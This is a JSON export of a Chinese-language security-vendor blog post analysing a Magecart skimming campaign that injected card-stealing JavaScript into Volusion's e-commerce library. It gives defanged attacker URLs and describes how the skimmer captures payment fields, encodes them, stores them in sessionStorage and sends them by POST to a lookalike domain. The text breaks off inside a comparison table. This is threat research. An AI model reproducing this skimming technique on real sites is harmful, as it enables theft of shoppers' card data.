{"id":62262,"date":"2019-10-17T09:00:54","date_gmt":"2019-10-17T01:00:54","guid":{"rendered":"https:\/\/blog.trendmicro.com.tw\/?p=62262"},"modified":"2019-10-18T10:17:49","modified_gmt":"2019-10-18T02:17:49","slug":"%e6%95%b8%e5%8d%83%e5%80%8b%e7%b6%b2%e8%b7%af%e5%95%86%e5%ba%97%e8%a2%ab%e6%b3%a8%e5%85%a5-magecart%e4%bf%a1%e7%94%a8%e5%8d%a1%e7%9b%9c%e5%8d%a1%e7%a8%8b%e5%bc%8f%e4%bb%8a%e5%b9%b4%e7%ac%ac%e4%b8%89","status":"publish","type":"post","link":"https:\/\/blog.trendmicro.com.tw\/?p=62262","title":{"rendered":"\u6578\u5343\u500b\u7db2\u8def\u5546\u5e97\u88ab\u6ce8\u5165 Magecart\u4fe1\u7528\u5361\u76dc\u5361\u7a0b\u5f0f,\u4eca\u5e74\u7b2c\u4e09\u8d77\u985e\u4f3c\u4e8b\u4ef6!"},"content":{"rendered":"\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p> \u6700\u8fd1<a href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2651&amp;name=20110916\">\u8da8\u52e2\u79d1\u6280<\/a>\u5728 3,126 \u500b\u7db2\u8def\u5546\u5e97\u7576\u4e2d\u767c\u73fe\u4e86<a rel=\"noreferrer noopener\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=58979\" target=\"_blank\"> Magecart<\/a> (\u4ea6\u7a31 <a rel=\"noreferrer noopener\" href=\"https:\/\/niccs.us-cert.gov\/sites\/default\/files\/documents\/pdf\/ncsam_eskimming_508.pdf?trackDocs=ncsam_eskimming_508.pdf\" target=\"_blank\">E-Skimming<\/a>) \u7db2\u8def\u4fe1\u7528\u5361\u76dc\u5361\u653b\u64ca\u3002 \u6b64\u6b21\u653b\u64ca\u6240\u7528\u7684\u7a0b\u5f0f\u78bc\u8207\u5148\u524d\u653b\u64ca<a rel=\"noreferrer noopener\" href=\"https:\/\/www.riskiq.com\/blog\/labs\/magecart-british-airways-breach\/\" target=\"_blank\">\u82f1\u570b\u822a\u7a7a<\/a> (British Airways) \u53ca <a rel=\"noreferrer noopener\" href=\"https:\/\/www.riskiq.com\/blog\/labs\/magecart-newegg\/\" target=\"_blank\">Newegg<\/a> \u6240\u7528\u7684\u985e\u4f3c\u3002\u76dc\u5361\u7a0b\u5f0f\u78bc\u6703\u62f7\u8c9d\u4ed8\u6b3e\u756b\u9762\u4e0a\u7684\u6240\u6709\u8cc7\u8a0a\uff0c\u5305\u62ec\u53d7\u5bb3\u8005\u7684\u59d3\u540d\u3001\u4f4f\u5740\u3001\u96fb\u8a71\u3001\u96fb\u5b50\u90f5\u4ef6\u4ee5\u53ca\u4fe1\u7528\u5361\u8a73\u7d30\u8cc7\u8a0a (\u5361\u865f\u3001\u6301\u5361\u4eba\u59d3\u540d\u3001\u5230\u671f\u6708\u4efd\u3001\u5230\u671f\u5e74\u4efd\u3001CVV \u9a57\u8b49\u78bc)\u3002\u5c08\u6311\u5927\u578b\u53d7\u5bb3\u8005\u4e0b\u624b\u7684 Magecart Group 6 \u99ed\u5ba2\u96c6\u5718\u6703\u8a66\u5716\u8a3b\u518a\u8207\u53d7\u5bb3\u8005\u7684\u7db2\u57df\u540d\u7a31\u76f8\u8fd1\u7684\u7db2\u57df\u4f86\u67b6\u8a2d\u63a5\u6536\u8cc7\u6599\u7684\u4f3a\u670d\u5668\u3002\u5728\u6b64\u6b21\u7684\u6848\u4f8b\u7576\u4e2d\uff0c\u6b79\u5f92\u63a5\u6536\u8cc7\u6599\u7684\u4f3a\u670d\u5668\u7db2\u57df\u70ba\u300cvolusion-cdn.com\u300d\u8207\u53d7\u5bb3\u8005 Volusion \u81ea\u5bb6\u7684\u7db2\u57df\u300ccdn3.volusion.com\u300d\u975e\u5e38\u76f8\u4f3c\u3002<\/p><p> \u8da8\u52e2\u79d1\u6280\u89e3\u6c7a\u65b9\u6848\u7686\u80fd\u4fdd\u8b77\u4f7f\u7528\u8005\u548c\u4f01\u696d\uff0c\u6709\u6548\u6514\u622a\u60e1\u610f\u8173\u672c\u4e26\u9632\u6b62\u4f7f\u7528\u8005\u9023\u4e0a\u60e1\u610f\u7db2\u57df \u3002\u4e00\u822c\u7528\u6236, \u53ef<a href=\"https:\/\/t.rend.tw\/?i=ODAzMw \">\u514d\u8cbb\u4e0b\u8f09\u8a66\u7528 PC-cillin \u96f2\u7aef\u7248<\/a> \u3002 <\/p><\/blockquote>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"479\" src=\"https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2017\/11\/AliExpress.jpg\" alt=\"\" class=\"wp-image-53504\" srcset=\"https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2017\/11\/AliExpress.jpg 700w, https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2017\/11\/AliExpress-300x205.jpg 300w, https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2017\/11\/AliExpress-600x411.jpg 600w, https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2017\/11\/AliExpress-30x21.jpg 30w\" sizes=\"(max-width: 700px) 100vw, 700px\" \/><\/figure>\n\n\n\n<p>\u6839\u64da\u6211\u5011\u7684\u8cc7\u6599\u986f\u793a\uff0c\u9019\u6ce2\u653b\u64ca\u59cb\u65bc 2019 \u5e74 9 \u6708 7 \u65e5\uff0c\u6240\u6709\u53d7\u5f71\u97ff\u7684\u7db2\u8def\u5546\u5e97\u90fd\u662f\u67b6\u8a2d\u5728 Volusion\u9019\u500b<a rel=\"noreferrer noopener\" href=\"https:\/\/www.ecommerceceo.com\/ecommerce-platforms\/\" target=\"_blank\">\u77e5\u540d\u96fb\u5b50\u5546\u52d9\u5e73\u53f0<\/a>\u4e0a\u3002\u4e8b\u5be6\u4e0a\uff0c\u9019\u5df2\u7d93\u662f\u6211\u5011\u7b2c\u4e09\u6b21\u767c\u73fe\u76dc\u5361\u7a0b\u5f0f\u88ab\u6ce8\u5165\u96fb\u5b50\u5546\u52d9\u5ee0\u5546\u7684\u96f2\u7aef\u5e73\u53f0\u3002\u4eca\u5e74\u5df2\u6709\u53e6\u5916\u5169\u5bb6\u5ee0\u5546\u53d7\u5bb3\uff1a\u4e00\u5bb6\u662f<a rel=\"noreferrer noopener\" href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada\/\" target=\"_blank\">\u6821\u5712<\/a>\u96fb\u5b50\u5546\u52d9\u5e73\u53f0\uff0c\u53e6\u4e00\u5bb6\u662f<a rel=\"noreferrer noopener\" href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites\/\" target=\"_blank\">\u98ef\u5e97<\/a>\u96fb\u5b50\u5546\u52d9\u5e73\u53f0\u3002\u5f88\u660e\u986f\u5730\uff0c\u9019\u4e9b\u76ee\u6a19\u4e4b\u6240\u4ee5\u6703\u88ab\u7db2\u8def\u72af\u7f6a\u96c6\u5718\u76ef\u4e0a\uff0c\u539f\u56e0\u5c31\u5728\u65bc\u9019\u4e9b\u5e73\u53f0\u5ee3\u53d7\u8a31\u591a\u7db2\u8def\u5546\u5e97\u9752\u775e\uff0c\u4f8b\u5982\u9019\u6b21\u53d7\u5bb3\u7684\u5e73\u53f0\u65d7\u4e0b\u6709\u6578\u5343\u5bb6\u5546\u5e97\u3002<\/p>\n\n\n\n<!--more-->\n\n\n\n<p>\u6839\u64da\u6211\u5011\u7684\u7814\u7a76\u767c\u73fe\uff0c\u6b79\u5f92\u662f\u5c07\u60e1\u610f\u7a0b\u5f0f\u78bc\u6ce8\u5165\u4e00\u500b\u7531\u96f2\u7aef\u96fb\u5b50\u5546\u52d9\u5e73\u53f0\nVolusion \u63d0\u4f9b\u7d66\u7528\u6236\u7aef\u5546\u5e97\u4f7f\u7528\u7684 JavaScript \u7a0b\u5f0f\u5eab\u3002\u88ab\u6ce8\u5165\u7684\u7a0b\u5f0f\u78bc\u6703\u518d\u8f09\u5165\u53e6\u4e00\u500b\u5132\u5b58\u5728 <a href=\"https:\/\/cloud.google.com\/storage\/\" target=\"_blank\" rel=\"noreferrer noopener\">Google Storage<\/a> \u670d\u52d9\u4e0a\u7684&nbsp; JavaScript \u8173\u672c\u3002\u9019\u500b\u8f09\u5165\u7684\u8173\u672c\u8207\u6b63\u5e38\u7684 JavaScript \u7a0b\u5f0f\u5eab\u5e7e\u4e4e\u4e00\u6a21\u4e00\u6a23\uff0c\u53ea\u5dee\u4e00\u6bb5\u88ab\u6ce8\u5165\u7684\u4fe1\u7528\u5361\u76dc\u5361\u7a0b\u5f0f\u78bc\u3002\u7576\u6d88\u8cbb\u8005\u5728\u7db2\u7ad9\u4e0a\u9001\u51fa\u4ed8\u6b3e\u8cc7\u8a0a\u6642\uff0c\u76dc\u5361\u7a0b\u5f0f\u78bc\u5c31\u6703\u5c07\u6d88\u8cbb\u8005\u7684\u500b\u4eba\u8cc7\u8a0a\u548c\u4fe1\u7528\u5361\u8cc7\u6599\u8907\u88fd\u4e26\u50b3\u9001\u5230\u99ed\u5ba2\u7684\u4f3a\u670d\u5668\u3002<\/p>\n\n\n\n<p>\u6211\u5011\u7684\u7814\u7a76\u5718\u968a\u5df2\u7d93\u5c07\u6b64\u4e8b\u901a\u5831\u7d66 Google\uff0cVolusion \u5df2<a href=\"https:\/\/twitter.com\/Volusion\/status\/1181652914340798467\" target=\"_blank\" rel=\"noreferrer noopener\">\u627f\u8a8d<\/a>\u4e26<a href=\"https:\/\/twitter.com\/Volusion\/status\/1181661671674335232?s=20\" target=\"_blank\" rel=\"noreferrer noopener\">\u4fee\u5fa9\u9019\u9805\u554f\u984c<\/a>\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/10\/Fig-1.jpg\" alt=\"Figure. 1\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/10\/Fig-1.jpg\"><\/a><\/p>\n\n\n\n<p>\u5716 1\uff1a\u7dda\u4e0a\u4fe1\u7528\u5361\u76dc\u5361\u6d41\u7a0b\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/10\/Fig-2.jpg\" alt=\"Figure. 2\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/10\/Fig-2.jpg\"><\/a><\/p>\n\n\n\n<p>\u5716 2\uff1a\u66fe\u7d93\u5b58\u53d6\u542b\u6709\u8a72\u76dc\u5361\u7a0b\u5f0f\u7684\u7db2\u8def\u5546\u5e97\u4f7f\u7528\u8005\u570b\u5bb6\u5206\u5e03\u72c0\u6cc1 (\u6839\u64da\u8da8\u52e2\u79d1\u6280\nSmart Protection Network&#x2122; \u5168\u7403\u5a01\u8105\u60c5\u5831\u7db2\u7684\u8cc7\u6599)\u3002<\/p>\n\n\n\n<p>\u6211\u5011\u5728\u8abf\u67e5\u904e\u7a0b\u4e2d\u767c\u73fe\u9019\u7fa4\u99ed\u5ba2\u4f3c\u4e4e\u6bd4\u5176\u4ed6\u76dc\u5361\u96c6\u5718\u66f4\u6709\u7d93\u9a57\uff0c\u601d\u616e\u4e5f\u66f4\u5468\u8a73\u3002\u4ed6\u5011\u4e26\u975e\u53ea\u662f\u55ae\u7d14\u5730\u5c07\u60e1\u610f\u7a0b\u5f0f\u78bc\u63d2\u5165\u8173\u672c\u7684\u9802\u7aef\u6216\u672b\u7aef\uff0c\u800c\u662f\u5c0f\u5fc3\u7ffc\u7ffc\u5730\u5c07\u7a0b\u5f0f\u78bc\u878d\u5165\u539f\u59cb\u8173\u672c\u7684\u57f7\u884c\u6d41\u7a0b\u7576\u4e2d\u3002\u6b64\u5916\uff0c\u5176\u7a0b\u5f0f\u78bc\u4e5f\u76e1\u91cf\u5beb\u5f97\u7c21\u6f54\uff0c\u8b93\u5b83\u5728\u4e00\u6574\u500b\u9f90\u5927\u7684\u7a0b\u5f0f\u5eab\u7576\u4e2d\u5f88\u96e3\u88ab\u767c\u73fe\u3002\u800c\u4e14\uff0c\u4ed6\u5011\u7528\u4f86\u63a5\u6536\u8cc7\u6599\u7684\u4f3a\u670d\u5668\u6240\u8a3b\u518a\u7684\u7db2\u57df\u540d\u7a31\u770b\u8d77\u4f86\u4e5f\u8ddf\nVolusion \u7684\u7db2\u57df\u5f88\u50cf\u3002<\/p>\n\n\n\n<p>\u5f9e\u5176\u72af\u7f6a\u624b\u6cd5\u4f86\u770b\uff0c\u6211\u5011\u8a8d\u70ba\u9019\u7fa4\u99ed\u5ba2\u61c9\u8a72\u662f\u4f86\u81ea\u65bc Magecart Group 6 \u99ed\u5ba2\u96c6\u5718\uff0c\u4ed6\u5011<a href=\"https:\/\/twitter.com\/ydklijnsma\/status\/1167837317232377856\" target=\"_blank\" rel=\"noreferrer noopener\">\u540c\u6642\u4e5f\u662f<\/a>\u60e1\u540d\u662d\u5f70\u7684\n<a href=\"https:\/\/securityintelligence.com\/posts\/more_eggs-anyone-threat-actor-itg08-strikes-again\/\" target=\"_blank\" rel=\"noreferrer noopener\">FIN6<\/a> \u72af\u7f6a\u96c6\u5718\u3002\u6211\u5011\u767c\u73fe\u6b64\u6b21\u653b\u64ca\u6240\u7528\u7684\u7a0b\u5f0f\u78bc\u8207 FIN6 \u5148\u524d\u653b\u64ca<a href=\"https:\/\/www.riskiq.com\/blog\/labs\/magecart-british-airways-breach\/\" target=\"_blank\" rel=\"noreferrer noopener\">\u82f1\u570b\u822a\u7a7a<\/a> (British Airways) \u53ca <a href=\"https:\/\/www.riskiq.com\/blog\/labs\/magecart-newegg\/\" target=\"_blank\" rel=\"noreferrer noopener\">Newegg<\/a>\n\u6240\u7528\u7684\u985e\u4f3c\u3002<\/p>\n\n\n\n<p><strong><em>\u7a0b\u5f0f\u78bc\u6ce8\u5165\u5206\u6790<\/em><\/strong><\/p>\n\n\n\n<p>\u99ed\u5ba2\u5c07\u7a0b\u5f0f\u78bc\u6ce8\u5165 Volusion \u96fb\u5b50\u5546\u52d9\u5e73\u53f0\u63d0\u4f9b\u7d66\u5ba2\u6236\u7aef\u5546\u5e97\u7684\u4e00\u500b\u7a0b\u5f0f\u5eab\u7576\u4e2d\u3002\u9019\u500b\u5728\u7a0b\u5f0f\u5eab\u5167\u5099\u8a3b\u4e2d\u63d0\u5230\u7684\u8173\u672c\uff0c\u5305\u542b\u4e86\u5546\u5e97\u700f\u89bd\u9078\u55ae\u5f48\u51fa\u5f0f\u529f\u80fd\u6240\u5fc5\u8981\u7684\u7a0b\u5f0f\u78bc\u3002\u6b64\u5916\uff0c\u4e5f\u7528\u65bc\u5546\u5e97\u7684\u7d50\u5e33\u9801\u9762\u3002\u9019\u4efd\u8173\u672c\u7684\u7db2\u5740\u4f4d\u65bc\uff1a<\/p>\n\n\n\n<p>\u2022 hxxps:\/\/[online\nshop domain]\/a\/j\/vnav.js<\/p>\n\n\n\n<p>\u99ed\u5ba2\u4e0d\u50c5\u5c07\u5176\u7a0b\u5f0f\u78bc\u6ce8\u5165\u5230\u7a0b\u5f0f\u5eab\u5167\u3002\u9084\u5c07\u5176\u7a0b\u5f0f\u78bc\u5167\u5d4c\u81f3\u539f\u672c\u7684 <a href=\"https:\/\/jqueryui.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">jQueryUI<\/a>\n\u51fd\u5f0f\u7576\u4e2d\uff0c\u96a8\u8457\u539f\u672c\u7684\u7a0b\u5f0f\u4e00\u8d77\u57f7\u884c\u3002\u4ed6\u5011\u5c31\u5728\u539f\u672c\u7684\u7269\u4ef6\u300ce.widget.bridge\u300d\u524d\u9762\u5efa\u7acb\u4e86\u4e00\u500b\u65b0\u7684\u7269\u4ef6\u300ce.widget.unbridge\u300d\uff0c\u800c\u60e1\u610f\u7a0b\u5f0f\u78bc\u5c31\u5728\u65b0\u7684\u7269\u4ef6\u7576\u4e2d\u3002\u503c\u5f97\u6ce8\u610f\u7684\u662f\uff0c\u99ed\u5ba2\u751a\u81f3\u6a21\u4eff\u539f\u672c\u7a0b\u5f0f\u78bc\u7684\u64b0\u5beb\u98a8\u683c\u4f86\u8b93\u9019\u6bb5\u7a0b\u5f0f\u770b\u8d77\u4f86\u66f4\u50cf\u662f\u539f\u59cb\u7a0b\u5f0f\u78bc\u7684\u4e00\u90e8\u4efd\u3002<\/p>\n\n\n\n<p>\u6ce8\u5165\u7684\u7a0b\u5f0f\u78bc\u6703\u5efa\u7acb\u4e00\u500b\u65b0\u7684\u8173\u672c\u5143\u7d20\u4f86\u8f09\u5165\u53e6\u4e00\u500b\u5132\u5b58\u5728 Google Storage \u4e0a\u7684\u9060\u7aef\u8173\u672c\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/10\/Fig-3.png\" alt=\"Figure. 3\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/10\/Fig-3.png\"><\/a>\u5716 3\uff1a\u6ce8\u5165\u5230 Volusion\nJavaScript \u7a0b\u5f0f\u5eab\u7576\u4e2d\u7684\u60e1\u610f\u8173\u672c\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/10\/Fig-4.png\" alt=\"Figure. 4\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/10\/Fig-4.png\"><\/a>\u5716 4\uff1aVolusion \u7684\u539f\u59cb\u8173\u672c\n(\u5de6) \u8207\u88ab\u6ce8\u5165\u60e1\u610f\u7a0b\u5f0f\u78bc\u5f8c\u7684\u8173\u672c (\u53f3) \u6bd4\u8f03 (\u7279\u5225\u6a19\u793a\u90e8\u5206\u5c31\u662f\u88ab\u6ce8\u5165\u7684\u7a0b\u5f0f\u78bc)\u3002<\/p>\n\n\n\n<p><strong>\u4fe1\u7528\u5361\u76dc\u5361\u7a0b\u5f0f\u78bc\u5206\u6790<\/strong><\/p>\n\n\n\n<p>\u9060\u7aef\u8173\u672c\u5132\u5b58\u5728 Google Storage \u4e0a\u7684\u4f4d\u5740\u5982\u4e0b\uff1a<\/p>\n\n\n\n<p>\u2022 hxxps[:]\/\/storage[.]googleapis[.]com\/volusionapi\/resources.js<\/p>\n\n\n\n<p>\u8a72\u8173\u672c\u5167\u7684\u5927\u90e8\u5206\u7a0b\u5f0f\u78bc\u90fd\u662f\u4f86\u81ea\u65bc\u300c<a href=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/js-cookie\/2.2.1\/js.cookie.js\" target=\"_blank\" rel=\"noreferrer noopener\">js-cookie<\/a>\u300d\u7a0b\u5f0f\u5eab 2.2.1 \u7248\u3002\u4e0d\u904e\uff0c\u99ed\u5ba2\u5df2\u505a\u4fee\u6539\u4e26\u4e14\u5728\u539f\u672c\u7684\u8173\u672c\u7576\u4e2d\u63d2\u5165\u4e86\u4e00\u6bb5\u76dc\u5361\u7a0b\u5f0f\u78bc\u3002\u9019\u6bb5\u76dc\u5361\u7a0b\u5f0f\u78bc\u6703\u5728\u9001\u51fa\u4ed8\u6b3e\u8cc7\u8a0a\u6309\u9215\u7684\u300c<a href=\"https:\/\/api.jquery.com\/mousedown\/\" target=\"_blank\" rel=\"noreferrer noopener\">mousedown<\/a>\u300d\u548c\u300c<a href=\"https:\/\/www.w3schools.com\/jsref\/event_touchstart.asp\" target=\"_blank\" rel=\"noreferrer noopener\">touchstart<\/a>\u300d\u4e8b\u4ef6\u6642\u57f7\u884c\u3002<\/p>\n\n\n\n<p>\u9019\u610f\u5473\u8457\uff0c\u7576\u53d7\u5bb3\u8005\u6309\u4e0b\u300c\u9001\u51fa\u300d\u6309\u9215\u6642\uff0c\u5c31\u6703\u89f8\u767c\u9019\u4e9b\u4e8b\u4ef6\uff0c\u7136\u5f8c\u76dc\u5361\u7a0b\u5f0f\u78bc\u5c31\u6703\u57f7\u884c\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/10\/Fig-5.png\" alt=\"Figure. 5\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/10\/Fig-5.png\"><\/a>\u5716 5\uff1a\u88ab\u6ce8\u5165\u76dc\u5361\u7a0b\u5f0f\u78bc\u7684\nJavaScript \u7a0b\u5f0f\u5eab (\u5de6) \u8207\u539f\u59cb\u7684\u300cjs-cookie\u300d\u7a0b\u5f0f\u5eab (\u53f3) \u6bd4\u8f03\u3002<\/p>\n\n\n\n<p>\u76dc\u5361\u7a0b\u5f0f\u78bc\u6703\u62f7\u8c9d\u4ed8\u6b3e\u756b\u9762\u4e0a\u7684\u6240\u6709\u8cc7\u8a0a\uff0c\u5305\u62ec\u53d7\u5bb3\u8005\u7684\u59d3\u540d\u3001\u4f4f\u5740\u3001\u96fb\u8a71\u3001\u96fb\u5b50\u90f5\u4ef6\u4ee5\u53ca\u4fe1\u7528\u5361\u8a73\u7d30\u8cc7\u8a0a\n(\u5361\u865f\u3001\u6301\u5361\u4eba\u59d3\u540d\u3001\u5230\u671f\u6708\u4efd\u3001\u5230\u671f\u5e74\u4efd\u3001CVV \u9a57\u8b49\u78bc)\u3002<\/p>\n\n\n\n<p>\u63a5\u8457\u5c07\u62f7\u8c9d\u7684\u8cc7\u6599\u5e8f\u5217\u5316\u6210\u5b57\u4e32\uff0c\u4e26\u4f7f\u7528 Base64 \u65b9\u5f0f\u7de8\u78bc\uff0c\u7136\u5f8c\u518d\u5c0d\u7de8\u78bc\u5f8c\u7684\u5b57\u4e32\u9032\u884c\u67d0\u7a2e\u6587\u5b57\u6392\u5217\u7d44\u5408\uff0c\u8b93\u5b57\u4e32\u7121\u6cd5\u76f4\u63a5\u7528 Base64 \u65b9\u5f0f\u89e3\u78bc\u3002<\/p>\n\n\n\n<p>\u6700\u5f8c\u518d\u5c07\u8a72\u8cc7\u6599\u5132\u5b58\u5728 <a href=\"https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/API\/Window\/sessionStorage\" target=\"_blank\" rel=\"noreferrer noopener\">sessionStorage<\/a> \u7576\u4e2d\uff0c\u4e26\u4f7f\u7528\u300c__utmz_opt_in_out\u300d\u70ba\u91d1\u9470\u3002\u4e0b\u6b21\u7576\u76dc\u5361\u7a0b\u5f0f\u78bc\u8f09\u5165\u6642 (\u901a\u5e38\u662f\u4ed8\u6b3e\u5b8c\u6210\u5f8c\u7684\u4e0b\u4e00\u500b\u756b\u9762)\uff0c\u5b83\u6703\u5075\u6e2c\nsessionStorage \u7576\u4e2d\u662f\u5426\u6709\u8cc7\u6599\u5b58\u5728\uff0c\u82e5\u6709\uff0c\u5c31\u6703\u4f7f\u7528 HTTP POST \u8acb\u6c42\u5c07\u9019\u4e9b\u5077\u4f86\u7684\u4ed8\u6b3e\u8cc7\u6599\u50b3\u9001\u81f3\u9060\u7aef\u4f3a\u670d\u5668\uff0c\u4f4d\u5740\u5728\uff1ahxxps[:]\/\/volusion-cdn[.]com\/analytics\/beacon\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/10\/Fig-6.png\" alt=\"Figure. 6\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/10\/Fig-6.png\"><\/a>\u5716 6\uff1a\u4fe1\u7528\u5361\u76dc\u5361\u7a0b\u5f0f\u78bc\u4e3b\u8981\u8173\u672c\u3002<\/p>\n\n\n\n<p>\u8acb\u6ce8\u610f\uff0c\u99ed\u5ba2\u7684\u9060\u7aef\u4f3a\u670d\u5668\u662f\u67b6\u8a2d\u5728\u300cvolusion-cdn.com\u300d\u9019\u500b\u7db2\u57df\u4e0a\uff0c\u8a72\u540d\u7a31\u8ddf Volusion \u672c\u8eab\u7684\u4f3a\u670d\u5668\u6240\u5728\u7db2\u57df\u5f88\u50cf\u3002\u99ed\u5ba2\u4e4b\u6240\u4ee5\u5c07\u76dc\u5361\u7a0b\u5f0f\u78bc\u5132\u5b58\u5728\nGoogle Storage \u662f\u56e0\u70ba Volusion \u81ea\u5df1\u4e5f\u662f\u4e00\u500b\u67b6\u8a2d\u5728 Google Cloud Platform \u4e0a\u7684<a href=\"https:\/\/cloud.google.com\/customers\/volusion\/\" target=\"_blank\" rel=\"noreferrer noopener\">\u670d\u52d9<\/a>\u3002<\/p>\n\n\n\n<p><strong><em>\u80cc\u5f8c\u70ba Magecart \u6216 FIN6 \u96c6\u5718\u7684\u8b49\u64da<\/em><\/strong><\/p>\n\n\n\n<p>\u6b63\u5982\u5148\u524d\u63d0\u5230\uff0c\u6839\u64da\u99ed\u5ba2\u7684\u72af\u6848\u624b\u6cd5\uff0c\u6211\u5011\u76f8\u4fe1\u5176\u80cc\u5f8c\u7684\u72af\u7f6a\u96c6\u5718\u61c9\u8a72\u662f Magecart Group 6\uff0c\u4e5f\u7a31\u70ba FIN6\u3002\u4ee5\u4e0b\u662f\u6211\u5011\u767c\u73fe\u7684\u4e00\u4e9b\u7dda\u7d22\uff1a<\/p>\n\n\n\n<ul><li>Magecart Group\n     6 \u6700\u77e5\u540d\u7684\u5c31\u662f\u5c08\u6311\u5927\u578b\u53d7\u5bb3\u8005\u4e0b\u624b\uff0c\u5c08\u9580\u5f9e\u4e8b\u55ae\u6b21\u7372\u5229\u9f90\u5927\u7684\u8a50\u9a19\u653b\u64ca\u3002\u5149 Volusion \u9019\u8d77\u653b\u64ca\u5c31\u8b93\u8a72\u96c6\u5718\u6709\u6a5f\u6703\u5f9e 3,126 \u500b\u7db2\u8def\u5546\u5e97\u8490\u96c6\u5927\u91cf\u7684\u4fe1\u7528\u5361\u8cc7\u6599\u3002<\/li><li>\u5f9e\u5148\u524d\u82f1\u570b\u822a\u7a7a\u8207 Newegg\n     \u7db2\u7ad9\u767c\u751f\u7684\u76dc\u5361\u653b\u64ca\u6211\u5011\u77e5\u9053\uff0cGroup 6 \u6703\u8a66\u5716\u8a3b\u518a\u8207\u53d7\u5bb3\u8005\u7684\u7db2\u57df\u540d\u7a31\u76f8\u8fd1\u7684\u7db2\u57df\u4f86\u67b6\u8a2d\u63a5\u6536\u8cc7\u6599\u7684\u4f3a\u670d\u5668\u3002\u5728\u6b64\u6b21\u7684\u6848\u4f8b\u7576\u4e2d\uff0c\u6b79\u5f92\u63a5\u6536\u8cc7\u6599\u7684\u4f3a\u670d\u5668\u7db2\u57df\u70ba\u300cvolusion-cdn.com\u300d\u8207\u53d7\u5bb3\u8005\n     Volusion \u81ea\u5bb6\u7684\u7db2\u57df\u300ccdn3.volusion.com\u300d\u975e\u5e38\u76f8\u4f3c\u3002\u6b64\u5916\uff0c\u82f1\u570b\u822a\u7a7a\u3001Newegg \u53ca Volusion \u9019\u4e09\u8d77\u653b\u64ca\u6240\u4f7f\u7528\u7684\u7db2\u57df\u90fd\u662f\u900f\u904e\n     <a href=\"https:\/\/www.namecheap.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">Namecheap<\/a> \u6a5f\u69cb\u6240\u8a3b\u518a\u3002<\/li><li>\u6211\u5011\u767c\u73fe\u6b64\u6b21\u653b\u64ca\u6240\u4f7f\u7528\u7684\u76dc\u5361\u7a0b\u5f0f\u78bc\uff0c\u662f\u5f9e\u5148\u524d\u82f1\u570b\u822a\u7a7a\u8207\n     Newegg \u653b\u64ca\u6240\u7528\u7684\u76dc\u5361\u7a0b\u5f0f\u78bc\u6539\u826f\u800c\u4f86\u3002\u65b0\u820a\u5169\u500b\u7248\u672c\u90fd\u4f7f\u7528\u4e86 jQuery\uff0c\u4e26\u4e14\u5c07\u5077\u5230\u7684\u8cc7\u6599\u5e8f\u5217\u5316\uff0c\u7136\u5f8c\u4f7f\u7528 jQuery.ajax \u7684\u51fd\u5f0f\u4f86\u5c07\u8cc7\u6599\u50b3\u9001\n     (POST) \u5230\u9060\u7aef\u4f3a\u670d\u5668\u3002\u820a\u7684\u76dc\u5361\u7a0b\u5f0f\u78bc\u8f03\u9019\u6b21\u7684\u7248\u672c\u7c21\u55ae\u8a31\u591a\uff0c\u4e26\u4e0d\u6703\u5c07\u5077\u5230\u7684\u8cc7\u6599\u7de8\u78bc\u6216\u5148\u5132\u5b58\u5728sessionStorage \u4e4b\u5f8c\u518d\u5916\u50b3\u3002<\/li><\/ul>\n\n\n\n<style>\n   table {border-collapse:collapse; table-layout:fixed; width:310px;}\n   table td {border:solid 1px ; width:100px; word-wrap:break-word;}\n   <\/style>\n<table  class=\"wp-block-table table table-hover\" ><tbody><tr><td>\n  <strong>\u653b\u64ca\u76ee\u6a19<\/strong>\n  <\/td><td>\n  <strong>\u8cc7\u6599\u5916\u50b3\u7684\u8173\u672c\u7a0b\u5f0f\u78bc<\/strong>\n  <\/td><\/tr><tr><td>\n  \u82f1\u570b\u822a\u7a7a (British Airways)\n  